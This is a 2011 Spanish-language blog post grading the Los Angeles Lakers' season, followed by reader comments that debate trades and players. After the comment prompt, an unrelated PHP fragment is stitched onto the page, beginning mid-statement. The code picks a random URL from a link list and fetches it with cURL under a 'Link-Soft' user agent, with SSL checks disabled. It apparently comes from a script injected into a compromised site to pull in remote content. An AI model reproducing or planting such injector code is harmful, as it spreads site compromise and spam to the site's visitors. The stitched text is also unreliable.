Los Angeles Lakers: Aprobado

04 de July de 2011 por Viva_Dirk

No se han cumplido los pronósticos. Desde que Pau Gasol llegara a los Lakers es la primera vez que estos no juegan la final de la NBA. No pasa nada, no se puede ganar siempre.

La temporada comenzó con un Kobe renqueante y sin Bynum, ante lo cual Pau respondió situándose entre los candidatos al MVP durante el primer mes y medio de competición. Lamar Odom estaba al 120% y además Shannon Brown cuajaba buenas actuaciones, lo que permitía al equipo ganar partidos sin forzar la vuelta de Bynum ni exprimir a Bryant. Una vez todas las piezas estuvieron disponibles al equipo se le veía ‘sobrao’ tanto para bien como para mal, y al final pesó más esto último.

Dallas les dio un repaso histórico en las semifinales de conferencia pero ya antes habían dado malísimas sensaciones contra unos Hornets que simplemente no tenían armas para eliminarlos. El mismo Pau que empezó la campaña a nivel de MVP completó unos playoffs vergonzosos y salvo Andrew Bynum ningun otro componente de la plantilla estuvo al nivel esperado durante ninguna de las series.

Lo mejor: La pareja Bryant&Gasol sigue siendo la élite de la liga, por si mismos son temibles. Hemos visto al mejor Andrew Bynum en estos playoffs. Lamar Odom ha completado una gran regular season y tiene un valor de traspaso alto.

Lo peor: Lamentable temporada de Ron Artest que una vez conseguido el anillo parece estar pendiente de un millón de cosas antes que del baloncesto. La salud de Bynum, otros 28 partidos perdidos esta temporada. Si los rumores de que Kobe y Pau tienen una relación más que tensa son ciertos se “jodió” el invento.

Jugando a GM

– Como he dicho, el valor de traspaso de Odom es alto. Han sonado opciones como Andre Iguodala y Derrick Williams pero ambas parecen haber sido rechazadas. Combinaciones como Sessions+Varejao, Diaw+Augustin o Andre Miller+Andersen le darían profundidad al equipo, mientras que una opción con estrellas como Monta Ellis o Danny Granger vendrían a completar otro trío estelar. Me inclino más por la primera opción.

– Hay que gastar la mid level y todo parece apuntar a un base cuando no abundan en la agencia libre. JJ Barea no creemos que salga de Dallas y el resto no mejora lo que hay. Otra opción es un forward y ahí si hay mas variedad. Thaddeus Young , Mbah a Moute, Tayshaun Prince o Mike Dunleavy serían buenas piezas.

– Estaría bien soltar los 23 millones que le quedan por cobrar a Artest pero no creemos que nadie pique. Siempre pueden probar añadiendo rondas y ofreciéndoselo a Chris Wallace por Mike Conley.

Comenta

13 comentarios a esta entrada

  1. M dice:
    #1

    ¿Aprobado? Por la forma como perdieron, no puedo compartirlo. No es que no se pueda ganar siempre, que sí…es que no se puede perder así…que también 😉 Creo que eran la mejor plantilla de la Liga y han dado una imagen lamentable la mayor parte de la temporada…yo los hubiera suspendido. Pero el análisis me parece estupendo, como casi siempre.

      Citar

  2. Cocinitas dice:
    #2

    Yo tambien estoy con M y los hubiera suspendido, hacer un papel como el que han hecho con esta plantilla no tiene perdón. Bien vamos a hacer un poquito de managers, yo en primer lugar intentaria fichar a Prince por la mid level creo que aceptaria y que le vendria de perlas al equipo. Intentaria un trade Odom más rondas del draft por un base quizá por Devin Harris que no ha cuajado en utah aunque esto lo veo dificil la verdad o puede que Stuckey en un sign and trade. Por supuesto me intentaria deshacer de Artest como fuera pero lo veo dificil. Muy a mi pesar y sin Jackson al mando creo que no será un buen año en LA.

      Citar

  3. Blade Petrovic dice:
    #3

    Para mí es un suspenso en toda regla por que los heat les umillaron en casa i los mavs……
    esto supone un fin de ciclo y seguramente habra cambios muchos cambios.
    Cuando se posteara el trivial 3

      Citar

  4. Esteban dice:
    #4

    calidads les sobra, sin dudas hubo otros problemas ahy, mala relacion de los jugadores o falta de motivacion, creo q con BROWN dara un paso al frente
    el maestro zen no involucraba jugadores en el equipo y dependian demasiado de 3 jugadores, creo q ahora abriran mas en ofensiva y eso les sera pòsitivo

      Citar

  5. Denise dice:
    #5

    Un suspenso, su imagen en playoffs, que es realmente donde hay que ponerse a jugar, ha sido lamentable, más por actitud que por falta de calidad, o si no, recordad aquel partido en cancha de los Spurs en el cual los angelinos ganaban de 30 al descanso, ó aquella racha de 13 o 14 victorias seguidas.
    En especial, un 0 patatero para Phil Jackson y su poca capacidad de motivar y reaccionar en estos PO, y otro cero para Kobe, Pau, Artest y Blake por sus pésimas actuaciones.

      Citar

  6. Viva_Dirk dice:
    #6

    Demasiados ceros Denise, demasiados ceros.

      Citar

  7. Esteban dice:
    #7

    jugando al gm:

    un cambio odom y artest, por granger y posey es posible

    los pacers necesitan un ala pivote y la expereicneia y buena temporada de odom les vensdria como anillo al dedo, mientras que artest creo q aun tiene algo para dar si es tomado en cuenta, ademas abriria el camino pàra q paul george juegue mas minutos, a los pacers les vendria genial dos campeones con tnta expereciencia, sumados a un escolta desde la agencia libre, los pacers estarian a la altura de pelear una semifinal de conferencia

    los lakers, consiguen a un alero q a promediado mas de 20 puntos por juego en los ultimos 3 años, daria aire en ataque a kobe y es all star, en su posicion debil y no deberian deshacerse de sus internos titulares, posey es un buen defensor, de ultimo año de contrato por lo q si le dan chances seguramente dejara todo, y si no funciona es un expiring de 7 millones al año, los lakers necesitan jugadores de ultimo año de contratos

    creo q es un cambio q a mabas partes les cuaja, los pacers no pueden seguir apostando a q granger los llevara lejos el solo, y en su lugar encontrarian dos veteranos con buen presente y mucha exeriencia en play offs para apuntalar a los jovenes, mientras q los lakers, suman un alero de enorme potencial, no para ser primera estrella de un equipo con aspiraciones pero le sobra para ser el cuarto jugador de un equipo

    los salarios cuajan!!!

    q les parece?

      Citar

  8. Txusma dice:
    #8

    A mi no me parece coherente decir que no se puede apostar por Granger pq no les llevara lejos y querer cambiarlo con Odom y Artest. A Ron (o como se llame ahora) no le quiere absolutamente nadie. Me da que después de ganar el anillo se va a echar a dormir y vamos a ver, de nuevo, su lado más estrafalario (lo del cambio de nombre ya apunta cositas).
    Si Granger se va debería ser por un ala-pívot de los buenos, buenos (Amare, Gasol…). Esos que darían un salto de calidad al equipo, no Odom.
    Y no les hace falta fichar ningún escolta pq ya lo tienen: George Hill. Además Paul George (q como comentas tiene futuro) tb puede jugar en esa posición.

      Citar

  9. Esteban dice:
    #9

    txuma, obviamente q seria mejor un cambio de granger por amare o gasol, pero simplemente el valor de granger no es tan alto, no vale por una estrella de ese nivel, es un estrella de segundo orden como ODOM, ademas no comparto lo de artest, su mala temporada se debio a que jackson no lo utilizaba en el triangulo, no tiene una misera jugada para el, antes de llegar a los lakers, estaba en los 17 pp, algo de ese jugador debe quedar, ademas un buen defensor nunca esta de mas

    odom y artest creo que aun tiene por dar, y ayudar a un grupo de jovenes con su experiencia, experiencia que no tiene granger

      Citar

  10. Sempren dice:
    #10

    Cuando veo a Artest botar el balón, correr, tirar, intentar jugarse balones difíciles… me pregunto cómo demonios podía conseguir tantos puntos xD
    La falta de esquemas influye en sus números, por supuesto, pero no creo que Artest valga para mucho más que para finalizar jugadas, y el juego Laker ya le daba bastantes opciones de tiro abierto y solo, y aún así…

    Por cierto, que me he acordado ahora del cambio Artest-Ariza, y si bien el primer año fue un 1 claro en su quiniela particular, este año es difícil decidir xD

      Citar

  11. Esteban dice:
    #11

    ariza parece mejor jugador, pero en realidad no lo es, es un kobe menos bueno, digamos, hacew un poco de todo, pero todo mas o menos, es algo habilidoso, algo saltador, algo tirador, algo penetrador, en fin, no sirve para nada, ARTEST, sacando este mal año, es un alero muy buen defensor, buien rebotero y nada mas, pero se sabia que podia contar con eso

    obviamente este ultimo año ha sido malo

      Citar

  12. simon dice:
    #12

    y digo yo y sin mirar si los salarios cuadrarian en estos traspasos:
    Howard por Gasol, se que orlando no sale favorecido pero mejor gasol que que se marche por nada en verano.
    Paul por Bynum mas alguna ronda.

    Se quedaria este equipo:
    Paul/Fisher/Blake
    Bryant
    Artest/Barnes/Ebanks
    Odom/Caracterer
    Howard
    el problema de mi equipo esque no hay nada de nada por dentro… y me falta un guard que cubra los minutos de kobe, en este caso entre blake y la renovacion de brown lo podriamos tener cubierto.

    con la mid buscaria un alero ¿¿prince ?? e intentaria engañar a alguien con artest y walton, no obstante en caso de no poder mejorar el equipo mas este año intentaria competir con ese buen quinteto sin muchos internos y al año siguiente haria dos paquetes. walton-fisher por un lado que son 9,5 millones de expiring y odom por otro lado que son 8 millones de expiring para conseguir un buen interno en el puesto de 4 y escolta suplente de bryant

      Citar

  13. safd dice:
    #13

    Lo q necesitan es al talismán de los dos títulos, al gran DJ EMBENGA xddddd

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>